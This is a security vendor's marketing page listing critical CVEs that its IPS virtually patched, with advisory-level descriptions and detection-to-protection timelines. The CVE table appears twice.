Rapid CVE Mitigation by Cato Security Research

OWASP defines virtual patching as “a security policy enforcement layer which prevents the exploitation of a known vulnerability”. Cato performs virtual patching via the IPS layer of the Cato Single Pass Cloud Engine (SPACE). Cato experts deploy new IPS rules to quickly adapt to new CVEs without requiring any customer involvement.

Selected Critical CVEs mitigated by Cato

Name

Atlassian Confluence Data Center & Server Remote Code Execution

CVE

CVE-2023-22527

Severity Score

10 (Critical)

Detect to Protect

1 Day

Description

A Remote Code Execution vulnerability in Atlassian Confluence Server & Data Center, allowing unauthenticated attackers to gain RCE access through template injection.

Detection

January 22, 2024

Opt-in Protection

January 22, 2024, 19:00 UTC

Global Protection

January 23, 2024, 11:00 UTC

Name

Apache Struts 2 File Upload Remote Code Execution

CVE

CVE-2023-50164

Severity Score

9.8 (Critical)

Detect to Protect

1 day

Description

Remote code execution via flawed file upload logic in Apache Struts 2 web framework, allowing for arbitrary file upload and code execution

Detection

POC available – December 12, 2023

Opt-in Protection

December 12, 2023

Global Protection

December 13, 2023

Name

Cisco IOS XE Web UI Privilege Escalation Vulnerability

CVE

CVE-2023-20198

Severity Score

10 (Critical)

Detect to Protect

2 days

Description

Privilege escalation is possible in internet facing Cisco devices running IOS XE and have the HTTP Web UI feature running

Detection

POC available – October 30, 2023 20:30 UTC

Opt-in Protection

October 31, 2023 20:00 UTC

Global Protection

November 1, 2023 20:00 UTC

Name

cURL SOCKS5 Proxy Heap Buffer Overflow

CVE

CVE-2023-38545

Severity Score

7.5 (High)

Detect to Protect

1 day and 3 hours

Description

A Heap Buffer Overflow vulnerability in hostname resolution during a SOCKS5 proxy handshake can result in malicious code execution by a vulnerable libcurl implementation

Detection

October 11, 2023 06:30 UTC

Opt-in Protection

October 11, 2023 20:00 UTC

Global Protection

October 12, 2023 9:30 UTC

Name

Atlassian Confluence Data Center & Server Privilege Escalation Vulnerability

CVE

CVE-2023-22515

Severity Score

10 (Critical)

Detect to Protect

1 day and 23 hours

Description

A Privilege Escalation Vulnerability in the on-premises version of Atlassian Confluence Server & Data Center, allowing attackers to exploit a vulnerable endpoint to create unauthorized administrator users and gain server access

Detection

October 4, 2023 13:00 UTC

Opt-in Protection

October 5, 2023 11:00 UTC

Global Protection

October 6, 2023 12:00 UTC

Name

MOVEit Transfer SQLi

CVE

CVE-2023-34362

Severity Score

10 (Critical)

Detect to Protect

3 days and 6 hours

Description

An SQLi in the managed file transfer (MFT) solution MOVEit Transfer by InProgress allows attackers to execute SQL commands and can result in installation of a dedicated backdoor allowing for RCE.

Detection

June 6, 2023 at 8:00 AM

Opt-in Protection

June 8, 2023 16:30 PM

Global Protection

June 9, 2023 14:00 PM

Name

Microsoft Outlook Remote Hash Vulnerability

CVE

CVE-2023-23397

Severity Score

9.8 (Critical)

Detect to Protect

0*

Description

Microsoft Outlook Elevation of Privilege Vulnerability * On the zero time: Outbound SMB traffic is blocked by default on Cato’s firewall

Detection

March 3, 2023 at 8:02 AM

Opt-in Protection

March 3, 2023 8:02 AM

Global Protection

March 3, 2023 8:02 AM

Name

OWASSRF, MS Exchange RCE

CVE

CVE-2022-41082

Severity Score

8.8 (High)

Detect to Protect

23 hours, 45 minutes

Description

Part of the ProxyNotShell exploit chain, some versions of MS Exchange are vulnerable to RCE (Remote Code Execution)

Detection

December 21, 2022 at 5:00 PM

Opt-in Protection

December 21, 2022 at 11:29 PM

Global Protection

December 22, 2022 at 4:45 PM

Name

Microsoft Exchange Remote Code Execution

CVE

CVE-2022-41040, CVE-2022-41082

Severity Score

8.8 (High)

Detect to Protect

2 days, 10 hours, 6 minutes

Description

Microsoft Exchange Server Elevation of Privilege Vulnerability

Detection

Sep 30th, 2022 at 1:19 PM

Opt-in Protection

September 30, 2022 at 11:25 PM

Global Protection

October 2, 2022 at 12:40 PM

Name

DogWalk – Microsoft Windows Support Diagnostic Tool Remote Code Execution

CVE

CVE-2022-34713

Severity Score

7.8 (High)

Detect to Protect

2 days, 4 hours, 54 minutes

Description

Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability

Detection

Aug 10th, 2022 at 11:22 AM

Opt-in Protection

August 11, 2022 at 6:38 PM

Global Protection

August 12, 2022 at 4:16 PM

Name

Apache Spark Remote Code Execution

CVE

CVE-2022-33891

Severity Score

8.8 (High)

Detect to Protect

1 day, 7 hours, 17 minutes

Description

The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as

Detection

July 19, 2022 at 10:06 AM

Opt-in Protection

July 19, 2022 at 7:25 PM

Global Protection

July 20, 2022 at 5:23 PM

Name

Microsoft Support Diagnostic Tool Remote Code Execution

CVE

CVE-2022-30190

Severity Score

7.8 (High)

Detect to Protect

1 day, 8 hours, 17 minutes

Description

Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.

Detection

May 31st, 2022 at 8:43 AM

Opt-in Protection

May 31, 2022 at 10:06 PM

Global Protection

June 1, 2022 at 5:00 PM

Name

VMware Tanzu Spring Cloud Function Remote Code Execution

CVE

CVE-2022-22963

Severity Score

9.8 (Critical)

Detect to Protect

2 days, 1 hour, 54 minutes

Description

In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources

Detection

Mar 30th, 2022 at 6:00 PM

Opt-in Protection

March 30, 2022 at 11:09 PM

Global Protection

April 1, 2022 at 7:54 PM

Name

Log4shell

CVE

CVE-2021-44228

Severity Score

10.0 (Critical)

Detect to Protect

17 hours, 2 minutes

Description

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled

Detection

Dec 10th, 2021 at 8:45 PM

Opt-in Protection

December 11, 2021 at 3:16 AM

Global Protection

December 11, 2021 at 1:47 PM

Name

Apache HTTP Server Path Traversal

CVE

CVE-2021-41773

Severity Score

7.5 (High)

Detect to Protect

1 day, 16 hours, 46 minutes

Description

A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution

Detection

Oct 6th, 2021 at 7:19 AM

Opt-in Protection

October 7, 2021 at 2:01 PM

Global Protection

October 8, 2021 at 12:05 AM

Name

Exchange Autodiscover Password

CVE

Severity Score

(Critical)

Detect to Protect

5 days, 5 hours, 30 minutes

Description

Detection

Sep 30th, 2021 at 2:33 PM

Opt-in Protection

September 30, 2021 at 5:40 PM

Global Protection

October 5, 2021 at 8:03 PM

Name

VMware vCenter RCE (II)

CVE

CVE-2021-22005

Severity Score

9.8 (Critical)

Detect to Protect

3 days, 10 hours, 1 minute

Description

The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file

Detection

Sep 23rd, 2021 at 8:36 AM

Opt-in Protection

September 23, 2021 at 6:23 PM

Global Protection

September 26, 2021 at 6:37 PM

Name

PrintNightmare Spooler RCE Vulnerability

CVE

CVE-2021-1675

Severity Score

8.8 (High)

Detect to Protect

6 days, 6 hours, 28 minutes

Description

Windows Print Spooler Elevation of Privilege Vulnerability

Detection

Jul 5th, 2021 at 12:16 PM

Opt-in Protection

July 11, 2021 at 10:52 AM

Global Protection

July 11, 2021 at 6:44 PM

Name

Sphere Client (HTML5) Remote Code Execution

CVE

CVE-2021-21985

Severity Score

9.8 (Critical)

Detect to Protect

3 days, 11 hours, 29 minutes

Description

The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server

Detection

May 31, 2021 at 10:55 AM

Opt-in Protection

June 1, 2021 at 9:47 PM

Global Protection

June 3, 2021 at 10:24 PM

Name

F5 Vulnerability

CVE

CVE-2021-22986

Severity Score

9.8 (Critical)

Detect to Protect

2 days, 19 hours, 38 minutes

Description

On specific versions of BIG-IP and BIG-IQ , the iControl REST interface has an unauthenticated remote command execution vulnerability

Detection

Mar 20th, 2021 at 11:43 PM

Opt-in Protection

Mar 23rd, 2021 at 12:12 PM

Global Protection

March 23, 2021 at 7:21 PM

Name

MS Exchange SSRF

CVE

CVE-2021-26855

Severity Score

9.8 (Critical)

Detect to Protect

4 days, 2 hours, 23 minutes

Description

Microsoft Exchange Server Remote Code Execution Vulnerability

Detection

March 3, 2021 at 11:03 AM

Opt-in Protection

March 4, 2021 at 10:48 PM

Global Protection

March 7, 2021 at 1:26 PM

Name

VMWare VCenter RCE

CVE

CVE-2021-21972

Severity Score

9.8 (Critical)

Detect to Protect

1 day, 1 hour, 57 minutes

Description

The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.

Detection

February 25, 2021 at 10:06 AM

Opt-in Protection

February 25, 2021 at 7:16 PM

Global Protection

February 26, 2021 at 12:03 PM

Name

Atlassian Confluence Data Center & Server Remote Code Execution

CVE

CVE-2023-22527

Severity Score

10

Detect to Protect

1 Day

Description

A Remote Code Execution vulnerability in Atlassian Confluence Server & Data Center, allowing unauthenticated attackers to gain RCE access through template injection.

Detection

January 22, 2024

Opt-in Protection

January 22, 2024, 19:00 UTC

Global Protection

January 23, 2024, 11:00 UTC

Name

Apache Struts 2 File Upload Remote Code Execution

CVE

CVE-2023-50164

Severity Score

9.8

Detect to Protect

1 day

Description

Remote code execution via flawed file upload logic in Apache Struts 2 web framework, allowing for arbitrary file upload and code execution

Detection

POC available – December 12, 2023

Opt-in Protection

December 12, 2023

Global Protection

December 13, 2023

Name

Cisco IOS XE Web UI Privilege Escalation Vulnerability

CVE

CVE-2023-20198

Severity Score

10

Detect to Protect

2 days

Description

Privilege escalation is possible in internet facing Cisco devices running IOS XE and have the HTTP Web UI feature running

Detection

POC available – October 30, 2023 20:30 UTC

Opt-in Protection

October 31, 2023 20:00 UTC

Global Protection

November 1, 2023 20:00 UTC

Name

cURL SOCKS5 Proxy Heap Buffer Overflow

CVE

CVE-2023-38545

Severity Score

7.5

Detect to Protect

1 day and 3 hours

Description

A Heap Buffer Overflow vulnerability in hostname resolution during a SOCKS5 proxy handshake can result in malicious code execution by a vulnerable libcurl implementation

Detection

October 11, 2023 06:30 UTC

Opt-in Protection

October 11, 2023 20:00 UTC

Global Protection

October 12, 2023 9:30 UTC

Name

Atlassian Confluence Data Center & Server Privilege Escalation Vulnerability

CVE

CVE-2023-22515

Severity Score

10

Detect to Protect

1 day and 23 hours

Description

A Privilege Escalation Vulnerability in the on-premises version of Atlassian Confluence Server & Data Center, allowing attackers to exploit a vulnerable endpoint to create unauthorized administrator users and gain server access

Detection

October 4, 2023 13:00 UTC

Opt-in Protection

October 5, 2023 11:00 UTC

Global Protection

October 6, 2023 12:00 UTC

Name

MOVEit Transfer SQLi

CVE

CVE-2023-34362

Severity Score

10

Detect to Protect

3 days and 6 hours

Description

An SQLi in the managed file transfer (MFT) solution MOVEit Transfer by InProgress allows attackers to execute SQL commands and can result in installation of a dedicated backdoor allowing for RCE.

Detection

June 6, 2023 at 8:00 AM

Opt-in Protection

June 8, 2023 16:30 PM

Global Protection

June 9, 2023 14:00 PM

Name

Microsoft Outlook Remote Hash Vulnerability

CVE

CVE-2023-23397

Severity Score

9.8

Detect to Protect

0*

Description

Microsoft Outlook Elevation of Privilege Vulnerability * On the zero time: Outbound SMB traffic is blocked by default on Cato’s firewall

Detection

March 3, 2023 at 8:02 AM

Opt-in Protection

March 3, 2023 8:02 AM

Global Protection

March 3, 2023 8:02 AM

Name

OWASSRF, MS Exchange RCE

CVE

CVE-2022-41082

Severity Score

8.8

Detect to Protect

23 hours, 45 minutes

Description

Part of the ProxyNotShell exploit chain, some versions of MS Exchange are vulnerable to RCE (Remote Code Execution)

Detection

December 21, 2022 at 5:00 PM

Opt-in Protection

December 21, 2022 at 11:29 PM

Global Protection

December 22, 2022 at 4:45 PM

Name

Microsoft Exchange Remote Code Execution

CVE

CVE-2022-41040, CVE-2022-41082

Severity Score

8.8

Detect to Protect

2 days, 10 hours, 6 minutes

Description

Microsoft Exchange Server Elevation of Privilege Vulnerability

Detection

Sep 30th, 2022 at 1:19 PM

Opt-in Protection

September 30, 2022 at 11:25 PM

Global Protection

October 2, 2022 at 12:40 PM

Name

DogWalk – Microsoft Windows Support Diagnostic Tool Remote Code Execution

CVE

CVE-2022-34713

Severity Score

7.8

Detect to Protect

2 days, 4 hours, 54 minutes

Description

Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability

Detection

Aug 10th, 2022 at 11:22 AM

Opt-in Protection

August 11, 2022 at 6:38 PM

Global Protection

August 12, 2022 at 4:16 PM

Name

Apache Spark Remote Code Execution

CVE

CVE-2022-33891

Severity Score

8.8

Detect to Protect

1 day, 7 hours, 17 minutes

Description

The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as

Detection

July 19, 2022 at 10:06 AM

Opt-in Protection

July 19, 2022 at 7:25 PM

Global Protection

July 20, 2022 at 5:23 PM

Name

Microsoft Support Diagnostic Tool Remote Code Execution

CVE

CVE-2022-30190

Severity Score

7.8

Detect to Protect

1 day, 8 hours, 17 minutes

Description

Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.

Detection

May 31st, 2022 at 8:43 AM

Opt-in Protection

May 31, 2022 at 10:06 PM

Global Protection

June 1, 2022 at 5:00 PM

Name

VMware Tanzu Spring Cloud Function Remote Code Execution

CVE

CVE-2022-22963

Severity Score

9.8

Detect to Protect

2 days, 1 hour, 54 minutes

Description

In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources

Detection

Mar 30th, 2022 at 6:00 PM

Opt-in Protection

March 30, 2022 at 11:09 PM

Global Protection

April 1, 2022 at 7:54 PM

Name

Log4shell

CVE

CVE-2021-44228

Severity Score

10.0

Detect to Protect

17 hours, 2 minutes

Description

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled

Detection

Dec 10th, 2021 at 8:45 PM

Opt-in Protection

December 11, 2021 at 3:16 AM

Global Protection

December 11, 2021 at 1:47 PM

Name

Apache HTTP Server Path Traversal

CVE

CVE-2021-41773

Severity Score

7.5

Detect to Protect

1 day, 16 hours, 46 minutes

Description

A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution

Detection

Oct 6th, 2021 at 7:19 AM

Opt-in Protection

October 7, 2021 at 2:01 PM

Global Protection

October 8, 2021 at 12:05 AM

Name

Exchange Autodiscover Password

CVE

Severity Score

Detect to Protect

5 days, 5 hours, 30 minutes

Description

Detection

Sep 30th, 2021 at 2:33 PM

Opt-in Protection

September 30, 2021 at 5:40 PM

Global Protection

October 5, 2021 at 8:03 PM

Name

VMware vCenter RCE (II)

CVE

CVE-2021-22005

Severity Score

9.8

Detect to Protect

3 days, 10 hours, 1 minute

Description

The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file

Detection

Sep 23rd, 2021 at 8:36 AM

Opt-in Protection

September 23, 2021 at 6:23 PM

Global Protection

September 26, 2021 at 6:37 PM

Name

PrintNightmare Spooler RCE Vulnerability

CVE

CVE-2021-1675

Severity Score

8.8

Detect to Protect

6 days, 6 hours, 28 minutes

Description

Windows Print Spooler Elevation of Privilege Vulnerability

Detection

Jul 5th, 2021 at 12:16 PM

Opt-in Protection

July 11, 2021 at 10:52 AM

Global Protection

July 11, 2021 at 6:44 PM

Name

Sphere Client (HTML5) Remote Code Execution

CVE

CVE-2021-21985

Severity Score

9.8

Detect to Protect

3 days, 11 hours, 29 minutes

Description

The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server

Detection

May 31, 2021 at 10:55 AM

Opt-in Protection

June 1, 2021 at 9:47 PM

Global Protection

June 3, 2021 at 10:24 PM

Name

F5 Vulnerability

CVE

CVE-2021-22986

Severity Score

9.8

Detect to Protect

2 days, 19 hours, 38 minutes

Description

On specific versions of BIG-IP and BIG-IQ , the iControl REST interface has an unauthenticated remote command execution vulnerability

Detection

Mar 20th, 2021 at 11:43 PM

Opt-in Protection

Mar 23rd, 2021 at 12:12 PM

Global Protection

March 23, 2021 at 7:21 PM

Name

MS Exchange SSRF

CVE

CVE-2021-26855

Severity Score

9.8

Detect to Protect

4 days, 2 hours, 23 minutes

Description

Microsoft Exchange Server Remote Code Execution Vulnerability

Detection

March 3, 2021 at 11:03 AM

Opt-in Protection

March 4, 2021 at 10:48 PM

Global Protection

March 7, 2021 at 1:26 PM

Name

VMWare VCenter RCE

CVE

CVE-2021-21972

Severity Score

9.8

Detect to Protect

1 day, 1 hour, 57 minutes

Description

The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.

Detection

February 25, 2021 at 10:06 AM

Opt-in Protection

February 25, 2021 at 7:16 PM

Global Protection

February 26, 2021 at 12:03 PM

Why is CVE Mitigation such a challenge?

Customers often struggle with the process, resources, and time it takes to protect their networks from emerging CVEs. Here is why:

The vendor must research the CVE and develop a signature

The customer needs to test the signature within a maintenance window

Customer testing must ensure the signature is not breaking the traffic or impacting inspection performance or the user experience

Only when testing is successful, can the signature be activated

This resource intensive process causes many customers to move their Intrusion Prevention System (IPS) to detection mode or fall behind on maintaining optimal security posture. This increases the risk of a breach as attackers attempt to exploit unpatched CVEs including old ones.

Fully automated Virtual Patching of Emerging CVEs with Cato Networks

Cato’s process for virtual patching consists of four steps, performed by the Cato security team:

Assessment

Assessing the scope of the CVE and researching the vulnerability. Specifically, any occurrences of attacks using this CVE in the wild.

Understanding which systems are affected and how threat actors perform the attack

Development

Creating a new IPS rule to virtually patch the vulnerability

Eliminating false positives based on back testing against traffic meta data

Opt-in Protection

Selective deployment of the virtual patch in "simulate mode"

Enabling opt-in prevention for specific customers

Global Protection

Moving the virtual patch to prevention mode

Enforcing the virtual patch across all customers and all traffic

This process runs without any involvement of customer resources, and without risking the customer business operation.

Request a Demo